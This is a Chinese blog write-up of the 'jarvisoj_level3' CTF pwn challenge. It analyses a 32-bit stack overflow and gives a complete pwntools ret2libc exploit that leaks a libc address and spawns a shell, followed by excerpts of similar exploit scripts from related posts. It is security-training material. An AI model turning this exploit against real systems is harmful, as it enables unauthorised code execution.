BUU刷题-Pwn-jarvisoj_level3(和攻防世界-Pwn-level3一样)

最新推荐文章于 2024-02-04 12:10:48 发布
原创 最新推荐文章于 2024-02-04 12:10:48 发布 · 172 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章详细介绍了如何利用栈溢出漏洞攻破一个名为level3的程序。程序存在栈溢出条件,且无栈保护,允许通过两次栈溢出泄露libc函数地址并获取shell。首先,通过溢出泄露write函数地址,然后计算libc基址,最后构造ROP链调用system执行/bin/sh获得控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[[攻防世界-Pwn-level3]]

解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:[[Stack上函数传参]]
  3. libc地址:[[利用got表和plt表泄露数据]]
  4. BSS段地址:无需
    劫持程序执行流程:[[ret2libc(栈溢出调用任意函数)]]
    获得shell或flag:[[调用libc中的system]]
学到的知识:

通过栈溢出将本来只可运行一次的溢出漏洞经行多次利用
[[一次调用多个函数的ROP链]]
学习到如何获得libc偏移:

  • 在线查询libc版本的网站:[https://libc.blukat.me/]
  • 一个python项目LibcSearcher[[LibcSearcher的使用]]
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file level3
level3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=44a438e03b4d2c1abead90f748a4b5500b7a04c7, not stripped
                                                                                                                     
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=level3
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified    Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   69) Symbols       No    0   1level3

libc版本:
wp借鉴:

核心伪代码分析:

存在利用的的代码:

ssize_t vulnerable_function()
{
  char buf[136]; // [esp+0h] [ebp-88h] BYREF

  write(1, "Input:\n", 7u);
  return read(0, buf, 0x100u);
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}
分析:

是一个简单的输入且有回复的程序,其中return read(0, buf, 0x100u);可以输入大量字符,且程序未开启栈溢出保护,所以可以使用Read漏洞实现栈溢出,且该程序无后门函数需要先将计算机中的函数地址泄露出来,再进行攻击。所以需要用到两次Read栈溢出漏洞,第一次先泄露任意函数地址,且将返回地址设置为main(以便第二此利用漏洞),在获取函数地址后,计算出sytem和“/bin/sh”的地址,并第二次利用栈溢出漏洞。即可获得主机权限。

1. 泄露或修改内存数据

存在的漏洞利用点:return read(0, buf, 0x100u);
通过IDA获取溢出点:距离为0x8c

-00000088 buf             db 136 dup(?)
+00000000  s              db  4  dup(?)
+00000004  r              db  4  dup(?)

通过GDB获取libc库函数地址:
0x8048310: read@plt
0x8048340: write@plt
0x804A018:write@got

.got.plt:0804A018 off_804A018     dd offset write         ; DATA XREF: _write↑r
2. 劫持程序执行流程

首先计算出栈溢出的位置,再调用write函数输出函数地址,并且要在泄露地址后再次利用栈溢出漏洞。且该程序为32位,将参数布置在栈上即可。

因此第一次利用漏洞时的布栈结构为:
ebp + 4 | 调用write函数(write@plt)
| 存储调用函数后的返回地址(使用主函数地址或者漏洞所在地址)
| write的第3参数(1)-》输出流参数
| write的第2参数(write@got)-》write的地址
| write的第1参数(6)-》输出的字节数

在获取write函数地址后,通过资料查询,获取write函数,system函数,”/bin/sh“参数与基地址的偏移量,从而进行第二次布栈。

因此第二次利用漏洞时的布栈结构为:
ebp + 4 | 调用system函数(system_addr)
| 返回地址(第二次布栈不需返回地址)
| “/bin/sh”的地址(bin_sh_addr)

3. 获得shell
脚本:
from pwn import *
context(log_level='debug',arch='i386',os='linux')

pwnfile='./level3'
sh = process(pwnfile)
#sh=remote("111.200.241.244",54369)

elf = ELF(pwnfile)
#elf_lic = ELF('./libc_32.so.6')

rec1=b'Input:\n'
rec2=b'Hello, World!\n'
write_plt=elf.plt['write']
print("write_plt:",hex(write_plt))
write_got=elf.got['write']
main_addr=elf.symbols['main']

#gdb.attach(sh)

payload1=b'a'*0x8c+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(6)
sh.recvuntil(rec1)
sh.sendline(payload1)



write_addr=u32(sh.recv(4))
print("write:",hex(write_addr))

#远程
'''
base_addr=write_addr-0xd43c0
print("base_addr=:",hex(base_addr))

bin_sh_addr=base_addr+0x15902b
print("bin_sh_addr:",hex(bin_sh_addr))

system_addr=base_addr+0x3a940
print("system_addr:",hex(system_addr))
'''

#本地
base_addr=write_addr-0xd4d50
print("base_addr=:",hex(base_addr))

bin_sh_addr=base_addr+0x172b62
print("bin_sh_addr:",hex(bin_sh_addr))

system_addr=base_addr+0x27d00
print("system_addr:",hex(system_addr))

payload2=b'a'*0x8c+p32(system_addr)+p32(1)+p32(bin_sh_addr)
sh.send(payload2)


sh.interactive()
Jarvis OJ--level3
Kni9hT's Blog
11-10 300
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 384
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF pwn——jarvisoj_level3
CNS-Enterprise BCC-1701-J
04-21 252
BUUCTF 做练习
BUUCTF jarvisoj_level3
红叶的博客
10-27 508
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 212
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
jarvisoj_level3
m0_52231248的博客
11-17 707
jarvisoj_level3 Checksec: Ida: 标准的ret2libc,offest=0x88+4 有writeread的plt地址 Exp: from pwn import* from LibcSearcher import* r=remote("node4.buuoj.cn",26088) elf=ELF('./level3') context.log_level = 'debug' payload=flat('a'*0x88+'bbbb') payload+=
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 784
checksec一下,栈溢出 IDA打开看看,很明显的溢出后门函数,一道白给 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF jarvisoj_level2
qq_51802916的博客
08-20 616
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 443
Buu CTF PWNjarvisoj_level0的WriteUp
BUUCTF Pwn jarvisoj_level21解步骤
最新发布
2301_81505831的博客
02-04 410
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRONX保护不影响我们做。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
BUUCTF】jarvisoj_level3
m0_51251108的博客
12-28 445
BUUCTF】jarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
BUUCTF-jarvisoj_level3
Rt1Text的博客
11-27 538
main很明显的溢出点再没有其它有用的信息,而且本没有system,bin/sh既然如此,解决思路就有了,泄露libc,32位的ret2libc3
[BUU-WP]jarvisoj_level3
m0sway的博客
11-22 845
jarvisoj_level3 使用checksec查看: 只开启了栈不可执行,估计又是一道栈溢出的目,直接放进IDA中看吧: 主函数中直接给了漏洞函数,跟进去查看: read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出 但这道没有system/bin/sh,一道标准的ret2libc 用write函数泄露libc地址,找system/bin/sh exp: from pwn import * #start r = remote("node4.buuo
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 375
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
[BUUCTF]PWN——jarvisoj_level3
qq_75021728的博客
02-23 215
[BUUCTF]PWN——jarvisoj_level3
jarvisoj_level3 [r2libc]
、moddemod
06-24 347
exp from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './level3' p = process(proc_name) # p = remote('node3.buuoj.cn', 28793) elf = ELF(proc_name) main_addr = elf.sym['main'] write_plt = elf.plt['write'] write_got = elf..
jarvisoj level3
sun的博客
10-03 1104
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值